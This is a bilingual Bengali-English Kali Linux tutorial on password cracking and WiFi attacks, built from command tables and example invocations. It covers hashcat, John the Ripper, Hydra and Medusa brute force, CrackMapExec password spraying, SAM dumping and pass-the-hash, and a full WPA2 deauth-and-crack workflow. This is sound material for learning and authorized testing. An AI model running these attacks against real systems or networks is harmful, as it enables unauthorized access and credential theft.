Kali Linux Series — Part 4: Password Attacks & Wireless

CHAPTER 01

⚡ Hashcat — GPU-powered Hash CrackerGPU-powered Hash Cracker

World-এর দ্রুততম password cracker — GPU ব্যবহার করে billion হাশ প্রতি সেকেন্ডে crack করতে পারেWorld's fastest password cracker — uses GPU to crack billions of hashes per second

⚡

hashcat

GPU-accelerated password recovery tool — MD5, SHA, NTLM, WPA2 সহ ৩০০+ hash type support করেGPU-accelerated password recovery — supports 300+ hash types including MD5, SHA, NTLM, WPA2

Hash Crack GPU-powered Brute Force

⚙️ Core Syntax ও FlagsCore Syntax & Flags

Flag	কাজFunction	উদাহরণExample
-m [type]	Hash type specify করো (নিচে দেখো)Specify hash type (see below)	-m 0 (MD5), -m 1000 (NTLM)
-a [mode]	Attack mode specify করো (নিচে দেখো)Specify attack mode (see below)	-a 0 (wordlist), -a 3 (brute)
-o file.txt	Cracked password output file-এ save করোSave cracked passwords to file	-o cracked.txt
--show	আগে crack হওয়া result দেখাওShow previously cracked results	hashcat -m 0 hashes.txt --show
--force	Warning ignore করে force চালাওForce run ignoring warnings	--force
-r rule.rule	Rule file apply করোApply rule file	-r /usr/share/hashcat/rules/best64.rule
--username	user:hash format-এর file handle করোHandle user:hash format files	--username
-w [1-4]	Workload profile (1=low, 4=nightmare)Workload profile (1=low, 4=nightmare)	-w 3
--status	Cracking status দেখাও (real-time)Show cracking status in real-time	--status
--restore	আগে বন্ধ করা session restore করোRestore previously stopped session	hashcat --restore
--session name	Session-এর নাম দাও (resume করার জন্য)Name the session (for later resume)	--session mysession
--increment	Mask length আস্তে আস্তে বাড়াওIncrementally increase mask length	--increment --increment-min=4
-D 1,2	Device type select করো (1=CPU, 2=GPU)Select device type (1=CPU, 2=GPU)	-D 2
--benchmark	GPU/CPU speed benchmark দেখাওShow GPU/CPU speed benchmark	hashcat --benchmark

🎯 Attack Modes (-a)Attack Modes (-a)

Mode	নামName	বিবরণDescription	উদাহরণExample
-a 0	WordlistWordlist	Dictionary থেকে একে একে try করোTry each word from dictionary	`hashcat -m 0 -a 0 hash.txt rockyou.txt`
-a 1	CombinationCombination	দুটো wordlist combine করোCombine two wordlists	`hashcat -m 0 -a 1 hash.txt w1.txt w2.txt`
-a 3	Brute Force / MaskBrute Force / Mask	Mask pattern দিয়ে সব combination tryTry all combinations using mask pattern	`hashcat -m 0 -a 3 hash.txt ?a?a?a?a`
-a 6	Wordlist + MaskWordlist + Mask	Wordlist-এর পরে mask যোগ করোAppend mask after each word	`hashcat -m 0 -a 6 hash.txt words.txt ?d?d`
-a 7	Mask + WordlistMask + Wordlist	Mask-এর পরে wordlist যোগ করোPrepend mask before each word	`hashcat -m 0 -a 7 hash.txt ?d?d words.txt`

🎭 Mask Characters — Brute Force PatternMask Characters — Brute Force Pattern

Character	মানেMeaning
`?l`	lowercase a-z
`?u`	uppercase A-Z
`?d`	digits 0-9
`?s`	special characters (!@#$...)
`?a`	?l + ?u + ?d + ?s (সব)
`?b`	0x00 - 0xff (binary)

# 8 character password (সব lowercase) ?l?l?l?l?l?l?l?l # 6 char — uppercase + digit শেষে ?u?l?l?l?l?d # Password1! style (common pattern) ?u?l?l?l?l?l?l?d?s # 4-8 char সব combination --increment --increment-min=4 --increment-max=8 ?a?a?a?a?a?a?a?a

🏷️ Hash Types (-m) — সবচেয়ে CommonHash Types (-m) — Most Common

-m value	Hash Type	উদাহরণ hashExample hash	ব্যবহারUsed in
0	MD5	`5f4dcc3b5aa765d61d8327deb882cf99`	Web apps, old systems
100	SHA1	`5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8`	Git, old systems
1400	SHA256	`5e884898da2847151d0e56f8dc6292...`	Linux /etc/shadow
1700	SHA512	`b109f3bbbc244eb82441917ed06d618...`	Modern Linux
1000	NTLM	`8846f7eaee8fb117ad06bdd830b7586c`	Windows SAM/AD
3000	LM	`299bd128c1101fd6`	Old Windows (XP)
5600	NetNTLMv2	`admin::N46iSNekpT:...`	Responder capture
3200	bcrypt	`$2a$10$N9qo8uLOickgx2ZMRZo...`	Modern web apps
500	md5crypt	`$1$salt$hash`	Old Linux
1800	sha512crypt	`$6$salt$hash`	Modern Linux /etc/shadow
2500	WPA/WPA2	`.hccapx file`	WiFi handshake
22000	WPA-PBKDF2-PMKID+EAPOL	`.hc22000 file`	Modern WiFi crack
13100	Kerberoast	`$krb5tgs$23$*user$...`	Active Directory
18200	AS-REP Roast	`$krb5asrep$23$...`	Active Directory
400	WordPress (phpass)	`$P$B...`	WordPress
1500	DES (Unix)	`rEK1ecacw.7.c`	Very old Unix

# MD5 wordlist attack root@kali:~# hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # NTLM (Windows) crack root@kali:~# hashcat -m 1000 -a 0 ntlm.txt /usr/share/wordlists/rockyou.txt # SHA256 + rules (best64) root@kali:~# hashcat -m 1400 -a 0 sha256.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule # Brute force — 8 char সব lowercase+digit root@kali:~# hashcat -m 0 -a 3 hash.txt ?l?l?l?l?d?d?d?d # bcrypt crack (ধীর — GPU recommended) root@kali:~# hashcat -m 3200 -a 0 bcrypt.txt rockyou.txt -w 3 # WPA2 crack (handshake file) root@kali:~# hashcat -m 22000 -a 0 capture.hc22000 rockyou.txt # Combination attack (word1+word2) root@kali:~# hashcat -m 0 -a 1 hash.txt words1.txt words2.txt # Password + 2 digits (wordlist + mask) root@kali:~# hashcat -m 0 -a 6 hash.txt rockyou.txt ?d?d # NetNTLMv2 (Responder থেকে capture) root@kali:~# hashcat -m 5600 -a 0 netntlmv2.txt rockyou.txt # Kerberoast (AD attack) root@kali:~# hashcat -m 13100 -a 0 kerb.txt rockyou.txt # Result দেখাও root@kali:~# hashcat -m 0 hashes.txt --show

CHAPTER 02

🔨 John the Ripper — Classic Password CrackerClassic Password Cracker

CPU-based classic cracker — Linux shadow, ZIP, SSH key, PDF crack করতে পারেCPU-based classic cracker — can crack Linux shadow, ZIP, SSH keys, PDFs

🔨

john

Openwall-এর তৈরি classic password cracker — file format auto-detect করে, built-in wordlist ও rules আছেClassic password cracker by Openwall — auto-detects formats, has built-in wordlists and rules

Hash Crack CPU-based File Crack

⚙️ Core CommandsCore Commands

Flag / Command	কাজFunction	উদাহরণExample
john hash.txt	Default mode-এ crack করো (format auto-detect)Crack in default mode (auto-detect format)	john hashes.txt
--wordlist=file	Wordlist দিয়ে crack করোCrack using wordlist	--wordlist=/usr/share/wordlists/rockyou.txt
--format=type	Hash format manually specify করোManually specify hash format	--format=NT, --format=md5crypt
--rules	Default rules apply করো (wordlist মোড)Apply default rules (in wordlist mode)	john hash.txt --wordlist=rk.txt --rules
--rules=Jumbo	Jumbo rules apply করো (বেশি variation)Apply Jumbo rules (more variations)	--rules=Jumbo
--incremental	Incremental mode — সব combination try করোIncremental mode — try all combinations	john hash.txt --incremental
--incremental=Digits	শুধু digit combination try করোTry only digit combinations	--incremental=Digits
--show	Cracked password দেখাওShow cracked passwords	john hash.txt --show
--pot=file	Custom pot file ব্যবহার করোUse custom pot file	--pot=my.pot
--list=formats	সব supported format দেখাওList all supported formats	john --list=formats
--fork=N	N টি process parallel চালাওRun N processes in parallel	--fork=4
--session=name	Session নাম দাও (resume করার জন্য)Name session for resuming later	--session=crack1
--restore=name	বন্ধ করা session resume করোResume a stopped session	--restore=crack1
--status	Current cracking status দেখাওShow current cracking status	john --status

🗂️ File Cracking — ZIP, SSH, PDF, etc.File Cracking — ZIP, SSH, PDF, etc.

💡 John-এর Helper ScriptsJohn's Helper Scripts

John-এ অনেক *2john script আছে যেগুলো বিভিন্ন file থেকে hash extract করে John-এর জন্য ready করে। Kali-তে /usr/share/john/ এ পাবে। John includes many *2john scripts that extract hashes from various files to prepare them for John. Find them at /usr/share/john/ in Kali.

File Type	Hash Extract Command	Crack Command
ZIP	zip2john secret.zip > zip.hash	john zip.hash --wordlist=rockyou.txt
RAR	rar2john secret.rar > rar.hash	john rar.hash --wordlist=rockyou.txt
SSH Key	ssh2john id_rsa > ssh.hash	john ssh.hash --wordlist=rockyou.txt
PDF	pdf2john doc.pdf > pdf.hash	john pdf.hash --wordlist=rockyou.txt
Linux Shadow	unshadow /etc/passwd /etc/shadow > unshadowed.txt	john unshadowed.txt --wordlist=rockyou.txt
KeePass	keepass2john database.kdbx > kp.hash	john kp.hash --wordlist=rockyou.txt
7z	7z2john archive.7z > 7z.hash	john 7z.hash --wordlist=rockyou.txt
Office	office2john doc.docx > office.hash	john office.hash --wordlist=rockyou.txt
Wifi	hccap2john capture.hccapx > wpa.hash	john wpa.hash --wordlist=rockyou.txt

# Linux shadow file crack (সবচেয়ে common) root@kali:~# unshadow /etc/passwd /etc/shadow > unshadowed.txt root@kali:~# john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt # ZIP password crack root@kali:~# zip2john secret.zip > zip_hash.txt root@kali:~# john zip_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # SSH private key crack (password-protected) root@kali:~# ssh2john id_rsa > ssh_hash.txt root@kali:~# john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # NTLM (Windows) hash crack root@kali:~# john ntlm.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt # Rules সহ (password variation বাড়ায়) root@kali:~# john hashes.txt --wordlist=rockyou.txt --rules=Jumbo # Cracked passwords দেখাও root@kali:~# john hashes.txt --show # Incremental mode (সব combination) root@kali:~# john hashes.txt --incremental --format=MD5 # Supported formats list root@kali:~# john --list=formats | grep -i md5

CHAPTER 03

🐉 Hydra — Online Brute Force ToolOnline Brute Force Tool

Live service-এ credential brute force — SSH, FTP, HTTP, SMTP, SMB, RDP সব protocol support করেBrute force credentials on live services — supports SSH, FTP, HTTP, SMTP, SMB, RDP and more

🐉

hydra

Fast ও flexible online password cracker — ৫০+ protocol support, parallel attack করেFast and flexible online password cracker — supports 50+ protocols, attacks in parallel

Brute Force Online Attack Multi-Protocol

⚙️ Core FlagsCore Flags

Flag	কাজFunction	উদাহরণExample
-l username	Single username specify করোSpecify single username	-l admin
-L userlist.txt	Username list file দাওProvide username list file	-L users.txt
-p password	Single password specify করোSpecify single password	-p password123
-P passlist.txt	Password list file দাওProvide password list file	-P /usr/share/wordlists/rockyou.txt
-C combo.txt	user:pass combination file দাওProvide user:pass combination file	-C credentials.txt
-t threads	Parallel thread count (default: 16)Number of parallel threads (default: 16)	-t 32
-s port	Custom port specify করোSpecify custom port	-s 2222
-v	Verbose mode — প্রতিটি attempt দেখাওVerbose — show each attempt	-v
-V	Extra verbose — login+password দেখাওExtra verbose — show login+password	-V
-d	Debug modeDebug mode	-d
-o file	Found credentials file-এ save করোSave found credentials to file	-o found.txt
-e nsr	n=null, s=same as login, r=reversed login try করোTry n=null, s=same as login, r=reversed login	-e nsr
-W seconds	Request-এর মধ্যে wait time (rate limit bypass)Wait time between requests (rate limit bypass)	-W 3
-x min:max:charset	Password generation করো (brute force mode)Generate passwords (brute force mode)	-x 4:8:a
-R	বন্ধ করা session resume করোResume a stopped session	-R
-S	SSL connection ব্যবহার করোUse SSL connection	-S

🌐 Protocol-specific CommandsProtocol-specific Commands

🔐 SSH

# SSH brute force — username fixed root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.5 # SSH — user list + password list root@kali:~# hydra -L users.txt -P passwords.txt 192.168.1.5 ssh # Custom port SSH root@kali:~# hydra -l admin -P rockyou.txt -s 2222 192.168.1.5 ssh -t 4

📁 FTP

# FTP brute force root@kali:~# hydra -l admin -P rockyou.txt ftp://192.168.1.5 # FTP anonymous check root@kali:~# hydra -l anonymous -p anonymous 192.168.1.5 ftp

🌐 HTTP Form Brute Force

# HTTP POST form brute force (সবচেয়ে common) # Format: hydra -l user -P pass target http-post-form "/path:user=^USER^&pass=^PASS^:error_string" root@kali:~# hydra -l admin -P rockyou.txt 192.168.1.5 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials" # HTTP GET form root@kali:~# hydra -l admin -P rockyou.txt 192.168.1.5 http-get-form "/login:user=^USER^&pass=^PASS^:F=incorrect" # HTTP Basic Auth root@kali:~# hydra -l admin -P rockyou.txt http-get://192.168.1.5/admin # HTTPS form root@kali:~# hydra -l admin -P rockyou.txt 192.168.1.5 https-post-form "/login:user=^USER^&pass=^PASS^:error"

🖥️ SMB, RDP, Other ProtocolsSMB, RDP, Other Protocols

# SMB brute force (Windows) root@kali:~# hydra -l administrator -P rockyou.txt smb://192.168.1.5 # RDP brute force root@kali:~# hydra -l administrator -P rockyou.txt rdp://192.168.1.5 -t 4 # MySQL brute force root@kali:~# hydra -l root -P rockyou.txt mysql://192.168.1.5 # PostgreSQL brute force root@kali:~# hydra -l postgres -P rockyou.txt postgres://192.168.1.5 # SMTP brute force root@kali:~# hydra -l user@target.com -P rockyou.txt smtp://192.168.1.5 # Telnet brute force root@kali:~# hydra -l admin -P rockyou.txt telnet://192.168.1.5 # VNC brute force root@kali:~# hydra -P rockyou.txt vnc://192.168.1.5 # IMAP brute force root@kali:~# hydra -l admin -P rockyou.txt imap://192.168.1.5 # Result file-এ save করো root@kali:~# hydra -L users.txt -P rockyou.txt 192.168.1.5 ssh -o found_creds.txt -t 16 -V

CHAPTER 04

🦅 Medusa & CrackMapExec

Parallel brute force ও network-wide credential testingParallel brute force and network-wide credential testing

🦅

medusa

Hydra-র alternative — highly parallel, modular login brute-forcer। Multiple host একসাথে attack করতে পারে।Hydra alternative — highly parallel, modular login brute-forcer. Can attack multiple hosts simultaneously.

Parallel Brute Multi-host

⚙️ Medusa — Core FlagsCore Flags

Flag	কাজFunction	উদাহরণExample
-h host	Target host specify করোSpecify target host	-h 192.168.1.5
-H hosts.txt	Multiple hosts file দাওProvide multiple hosts file	-H hosts.txt
-u username	Single usernameSingle username	-u admin
-U users.txt	Username list fileUsername list file	-U users.txt
-p password	Single passwordSingle password	-p password123
-P passlist.txt	Password list filePassword list file	-P rockyou.txt
-M module	Protocol module specify করোSpecify protocol module	-M ssh, -M ftp, -M http
-n port	Custom portCustom port	-n 2222
-t threads	Threads per hostThreads per host	-t 4
-T hosts	Parallel host countNumber of parallel hosts	-T 10
-O file	Output file-এ save করোSave output to file	-O medusa_out.txt
-v level	Verbose level (0-6)Verbose level (0-6)	-v 6

# SSH brute force root@kali:~# medusa -h 192.168.1.5 -u root -P rockyou.txt -M ssh # Multiple hosts একসাথে root@kali:~# medusa -H hosts.txt -u admin -P rockyou.txt -M ftp -T 10 -t 4 # HTTP form brute force root@kali:~# medusa -h 192.168.1.5 -u admin -P rockyou.txt -M http -m DIR:/admin -m FORM:user=^USER^&pass=^PASS^ # Module list দেখাও root@kali:~# medusa -d

🗺️

crackmapexec / cme

Network-wide credential testing ও post-exploitation — SMB, WinRM, LDAP, SSH একসাথে attack করোNetwork-wide credential testing and post-exploitation — attack SMB, WinRM, LDAP, SSH simultaneously

Network Sweep Credential Test AD Attack

⚙️ CrackMapExec — Commands

কমান্ডCommand	কাজFunction
cme smb 192.168.1.0/24	Subnet-এ সব SMB host discover করোDiscover all SMB hosts on subnet
cme smb target -u user -p pass	Single credential দিয়ে login test করোTest login with single credential
cme smb target -u users.txt -p pass	User list দিয়ে password spray করোPassword spray with user list
cme smb target -u user -p pass --shares	SMB shares enumerate করোEnumerate SMB shares
cme smb target -u user -p pass --sam	SAM database dump করোDump SAM database
cme smb target -u user -p pass --lsa	LSA secrets dump করোDump LSA secrets
cme smb target -u user -p pass -x "whoami"	Remote command execute করো (cmd)Execute remote command (cmd)
cme smb target -u user -p pass -X "Get-Process"	PowerShell command execute করোExecute PowerShell command
cme smb target -u user -H hash	Pass-the-Hash attack করোPerform Pass-the-Hash attack
cme smb target -u user -p pass --users	Domain users enumerate করোEnumerate domain users
cme smb target -u user -p pass --groups	Domain groups enumerate করোEnumerate domain groups
cme winrm target -u user -p pass	WinRM login test করোTest WinRM login
cme ssh target -u user -p pass	SSH login test করোTest SSH login
cme ldap target -u user -p pass	LDAP query করো (AD)Query LDAP (Active Directory)

# Subnet discovery root@kali:~# cme smb 192.168.1.0/24 # Credential validate করো root@kali:~# cme smb 192.168.1.5 -u administrator -p 'P@ssword123' # Password spray (একটি password সব user-এ) root@kali:~# cme smb 192.168.1.5 -u users.txt -p 'Password123' --continue-on-success # Hash dump root@kali:~# cme smb 192.168.1.5 -u admin -p pass --sam # Pass-the-Hash root@kali:~# cme smb 192.168.1.5 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' # Remote command execute করো root@kali:~# cme smb 192.168.1.5 -u admin -p pass -x "ipconfig /all"

CHAPTER 05

📡 WiFi Hacking — Aircrack-ng Suite

WPA2 handshake capture থেকে password crack পর্যন্ত — সম্পূর্ণ WiFi hacking workflowFrom WPA2 handshake capture to password crack — complete WiFi hacking workflow

📡 WiFi Hacking-এ কী কী Tool দরকার?What Tools Do You Need for WiFi Hacking?

Aircrack-ng Suite-এ চারটি প্রধান tool আছে: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (attack/deauth), aircrack-ng (crack)। এছাড়া WiFi adapter-এ monitor mode support থাকতে হবে। Aircrack-ng Suite has four main tools: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (attack/deauth), aircrack-ng (crack). Your WiFi adapter must support monitor mode.

WiFi Hacking Workflow:

Step 1: airmon-ng start wlan0          → Monitor mode চালু
          ↓
Step 2: airodump-ng wlan0mon            → Networks scan করো
          ↓
Step 3: airodump-ng -c [CH] --bssid [MAC] -w capture wlan0mon  → Handshake capture
          ↓
Step 4: aireplay-ng --deauth 10 -a [BSSID] wlan0mon  → Client disconnect করো
          ↓
Step 5: WPA handshake captured! (capture.cap file)
          ↓
Step 6: aircrack-ng -w rockyou.txt capture.cap  → Password crack করো

📻 airmon-ng — Monitor ModeMonitor Mode

📻

airmon-ng

WiFi adapter-কে Monitor Mode-এ রাখো — সব wireless traffic capture করার জন্যPut WiFi adapter into Monitor Mode — to capture all wireless traffic

Monitor Mode

কমান্ডCommand	কাজFunction
airmon-ng	Available wireless interfaces দেখাওShow available wireless interfaces
airmon-ng check	Interfering processes দেখাওShow interfering processes
airmon-ng check kill	Interfering processes kill করো (NetworkManager ইত্যাদি)Kill interfering processes (NetworkManager etc.)
airmon-ng start wlan0	wlan0-তে monitor mode চালু করো → wlan0mon তৈরি হবেEnable monitor mode on wlan0 → creates wlan0mon
airmon-ng start wlan0 6	নির্দিষ্ট channel-এ monitor mode চালু করোEnable monitor mode on specific channel
airmon-ng stop wlan0mon	Monitor mode বন্ধ করোDisable monitor mode
iwconfig	Interface mode verify করো (Mode:Monitor দেখাবে)Verify interface mode (shows Mode:Monitor)

📡 airodump-ng — Packet CapturePacket Capture

📡

airodump-ng

WiFi networks scan করো ও WPA handshake capture করোScan WiFi networks and capture WPA handshakes

Packet Capture

Flag	কাজFunction	উদাহরণExample
airodump-ng wlan0mon	সব nearby networks দেখাও (scan)Show all nearby networks (scan)	airodump-ng wlan0mon
-c channel	নির্দিষ্ট channel lock করোLock to a specific channel	-c 6
--bssid MAC	Target AP-এর MAC address specify করোSpecify target AP MAC address	--bssid AA:BB:CC:DD:EE:FF
-w filename	Capture file-এ save করোSave capture to file	-w capture
--output-format	Output format specify করো (pcap, csv, kismet)Specify output format	--output-format pcap
--band abg	Band specify করো (2.4GHz=bg, 5GHz=a)Specify band (2.4GHz=bg, 5GHz=a)	--band abg
--wps	WPS-enabled networks দেখাওShow WPS-enabled networks	--wps
--encrypt WPA	শুধু WPA networks filter করোFilter only WPA networks	--encrypt WPA

💥 aireplay-ng — Injection & Deauth AttackInjection & Deauth Attack

💥

aireplay-ng

Deauthentication attack দিয়ে client disconnect করো — WPA handshake capture করার জন্যDisconnect clients with deauth attack — to force WPA handshake capture

Deauth Attack

Flag / Attack	কাজFunction	উদাহরণExample
--deauth N -a BSSID	AP-এর সব client-কে N packets deauth করোDeauth all clients from AP with N packets	--deauth 10 -a AA:BB:CC:DD:EE:FF
--deauth N -a BSSID -c CLIENT	নির্দিষ্ট client-কে deauth করোDeauth a specific client	--deauth 10 -a AP_MAC -c CLIENT_MAC
--deauth 0	Continuous deauth (0 = infinite)Continuous deauth (0 = infinite)	--deauth 0 -a BSSID
--fakeauth 0 -a BSSID	Fake authentication (WEP attack)Fake authentication (WEP attack)	--fakeauth 0 -a BSSID -h OWN_MAC
--arpreplay -b BSSID	ARP replay attack (WEP attack)ARP replay attack (WEP crack)	--arpreplay -b BSSID -h MAC
--test	Injection test করোTest packet injection	aireplay-ng --test wlan0mon

🔑 aircrack-ng — WPA2 Password CrackWPA2 Password Crack

🔑

aircrack-ng

Captured handshake থেকে WPA2 password crack করোCrack WPA2 password from captured handshake

Password Crack

Flag	কাজFunction	উদাহরণExample
aircrack-ng capture.cap	Capture file analyze করো (handshake আছে কিনা)Analyze capture file (check for handshake)	aircrack-ng capture-01.cap
-w wordlist.txt	Wordlist দিয়ে crack করোCrack using wordlist	-w /usr/share/wordlists/rockyou.txt
-b BSSID	নির্দিষ্ট AP target করোTarget a specific AP	-b AA:BB:CC:DD:EE:FF
-e ESSID	Network name (SSID) specify করোSpecify network name (SSID)	-e "HomeNetwork"
-l output.txt	Cracked key file-এ save করোSave cracked key to file	-l cracked_key.txt

🔄 সম্পূর্ণ WPA2 Crack WorkflowComplete WPA2 Crack Workflow

═══ Step 1: Interfering process বন্ধ করো ═══ root@kali:~# airmon-ng check kill ═══ Step 2: Monitor mode চালু করো ═══ root@kali:~# airmon-ng start wlan0 [*] Interface wlan0mon created ═══ Step 3: Network scan করো — Target খোঁজো ═══ root@kali:~# airodump-ng wlan0mon # BSSID, CH (channel), ESSID (name) note করো ═══ Step 4: Target-এ focused capture শুরু করো ═══ root@kali:~# airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # এই terminal খোলা রাখো! Handshake capture হওয়া পর্যন্ত ═══ Step 5: নতুন terminal-এ deauth attack ═══ root@kali:~# aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Client disconnect হলে reconnect করবে → handshake capture হবে # airodump-ng terminal-এ "WPA handshake: AA:BB:CC:DD:EE:FF" দেখাবে ═══ Step 6: Capture verify করো ═══ root@kali:~# aircrack-ng capture-01.cap ═══ Step 7: Password crack করো ═══ root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap ═══ (Optional) Hashcat দিয়ে দ্রুত crack করো ═══ # .cap → .hc22000 convert করো root@kali:~# hcxpcapngtool -o capture.hc22000 capture-01.cap root@kali:~# hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt ═══ Step 8: Monitor mode বন্ধ করো ═══ root@kali:~# airmon-ng stop wlan0mon root@kali:~# service NetworkManager start

📱 PMKID Attack — Client ছাড়াই WPA2 CrackCrack WPA2 Without a Client

# hcxdumptool দিয়ে PMKID capture করো (client দরকার নেই) root@kali:~# hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 # Convert করো root@kali:~# hcxpcapngtool -o hash.hc22000 pmkid.pcapng # Hashcat দিয়ে crack করো root@kali:~# hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

CHAPTER 06

🏷️ Hash Identification — কোন Hash কোনটা?Hash Identification — Identifying Hash Types

Hash দেখে type চেনো — hashid ও hash-identifier tool ব্যবহার করোIdentify hash types by appearance — use hashid and hash-identifier tools

🔧 Hash Identification ToolsHash Identification Tools

# hashid — সবচেয়ে ভালো tool root@kali:~# hashid '5f4dcc3b5aa765d61d8327deb882cf99' [+] MD2 [+] MD5 [+] MD4 # hashid — Hashcat mode সহ দেখাও (-m flag) root@kali:~# hashid -m '5f4dcc3b5aa765d61d8327deb882cf99' [+] MD5 [Hashcat Mode: 0] # hashid — file থেকে সব hash identify করো root@kali:~# hashid -m hashes.txt # hash-identifier (interactive) root@kali:~# hash-identifier #### Enter Hash: 5f4dcc3b5aa765d61d8327deb882cf99 HASH: MD5

🔑 Hash চেনার Quick ReferenceQuick Hash Recognition Reference

Hash দেখতে এরকমHash looks like	Type	Hashcat -m
`5f4dcc3b5aa765d61d8327deb882cf99` (32 chars)	MD5	0
`5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8` (40 chars)	SHA1	100
`5e884898da28...` (64 chars)	SHA256	1400
`b109f3bbbc244eb82441917...` (128 chars)	SHA512	1700
`8846f7eaee8fb117ad06bdd830b7586c` (32 chars, Windows)	NTLM	1000
`$1$salt$hash`	MD5crypt (Linux)	500
`$2a$10$...` বা `$2y$...`	bcrypt	3200
`$5$salt$hash`	SHA256crypt (Linux)	7400
`$6$salt$hash`	SHA512crypt (Linux)	1800
`$P$B...` (WordPress)	phpass	400
`admin::N46iSNek:...`	NetNTLMv2	5600
`$krb5tgs$23$...`	Kerberoast	13100

CHAPTER 07

📚 Wordlist ও Password GenerationWordlists & Password Generation

Best wordlists, crunch দিয়ে custom wordlist তৈরি, cewl দিয়ে website থেকে wordlistBest wordlists, create custom wordlists with crunch, generate from website with cewl

📂 Kali-তে Built-in WordlistsBuilt-in Wordlists in Kali

Path	Size	ব্যবহারBest for
`/usr/share/wordlists/rockyou.txt`	14M passwords	Password cracking (সবচেয়ে popular)Password cracking (most popular)
`/usr/share/wordlists/dirb/common.txt`	4,614 words	Directory brute force (fast)
`/usr/share/wordlists/dirb/big.txt`	20,469 words	Directory brute force (thorough)
`/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`	220,560	Web directory (comprehensive)
`/usr/share/seclists/`	Massive	Everything (install: apt install seclists)
`/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt`	1000	Quick password test
`/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt`	5000	Subdomain brute force
`/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt`	119k	Large web content discovery

🔧 crunch — Custom Wordlist GeneratorCustom Wordlist Generator

Flag	কাজFunction	উদাহরণExample
crunch min max	min থেকে max length পর্যন্ত সব word generateGenerate all words from min to max length	crunch 4 6
crunch min max charset	নির্দিষ্ট character set দিয়ে generateGenerate using specific character set	crunch 4 4 abc123
-o file	File-এ save করোSave to file	-o wordlist.txt
-t pattern	Pattern দিয়ে generate (@ lowercase, , uppercase, % digit, ^ special)Generate with pattern (@ lower, , upper, % digit, ^ special)	-t admin@@@
-b size	File size limit per fileLimit output file size	-b 100mb
-d count	Duplicate consecutive character limitLimit duplicate consecutive characters	-d 2

# 6-8 char lowercase wordlist root@kali:~# crunch 6 8 abcdefghijklmnopqrstuvwxyz -o lowercase.txt # Pattern: admin + 3 digits root@kali:~# crunch 8 8 -t admin%%% -o admin_pass.txt # Uppercase + digit শুরুতে ও শেষে root@kali:~# crunch 8 8 -t ,@@@@@% -o complex.txt # Phone number format (Bangladesh: 01XXXXXXXXX) root@kali:~# crunch 11 11 -t 01%%%%%%%%% -o bd_phones.txt

🌐 CeWL — Website থেকে Wordlist তৈরিGenerate Wordlist from Website

Flag	কাজFunction	উদাহরণExample
cewl http://target.com	Website থেকে unique words collect করোCollect unique words from website	cewl http://target.com
-d depth	Crawl depth সেট করো (default: 2)Set crawl depth (default: 2)	-d 3
-m length	Minimum word length সেট করোSet minimum word length	-m 6
-w file	Output file-এ save করোSave output to file	-w cewl_list.txt
--email	Email addresses-ও collect করোAlso collect email addresses	--email
-v	Verbose outputVerbose output	-v

# Website থেকে wordlist তৈরি করো (min 6 char, depth 3) root@kali:~# cewl http://target.com -d 3 -m 6 -w target_wordlist.txt # Email সহ collect করো root@kali:~# cewl http://target.com --email -w target_full.txt # তারপর John দিয়ে crack করো root@kali:~# john hashes.txt --wordlist=target_wordlist.txt --rules

🔑 Password Attack Strategy — সঠিক পদ্ধতিPassword Attack Strategy — Correct Approach

1️⃣ Hash Identify: আগে hashid দিয়ে hash type চেনো → Hashcat -m value জেনে নাওHash Identify: First identify with hashid → get Hashcat -m value
2️⃣ Quick Win: rockyou.txt দিয়ে wordlist attack করো আগেQuick Win: Try wordlist attack with rockyou.txt first
3️⃣ Rules: best64.rule বা Jumbo rules দিয়ে variation বাড়াওRules: Add variations with best64.rule or Jumbo rules
4️⃣ Mask: Pattern জানা থাকলে mask attack করো (দ্রুত)Mask: If you know the pattern, use mask attack (faster)
5️⃣ CeWL: Target-specific password list তৈরি করোCeWL: Generate target-specific password list
6️⃣ Brute Force: শেষ উপায় হিসেবে brute force — অনেক সময় লাগবেBrute Force: Last resort — will take a long time

🔑 "A strong password is your first line of defense — and often the last thing standing between an attacker and your data."

সব কিছু authorized environment-এ practice করো। অন্যের WiFi বা system-এ attack করা সম্পূর্ণ illegal। Practice everything in authorized environments only. Attacking others' WiFi or systems is completely illegal.

Kali Linux Series — Part 4 | v1.0 | Password Attacks & Wireless

Part 5: Post-Exploitation & Forensics (Netcat, LinPEAS, Volatility, Autopsy) →

Kali Linux — Part 4

Password Attacks & Wireless Hacking — সম্পূর্ণ বাংলা গাইড Password Attacks & Wireless Hacking — Complete Guide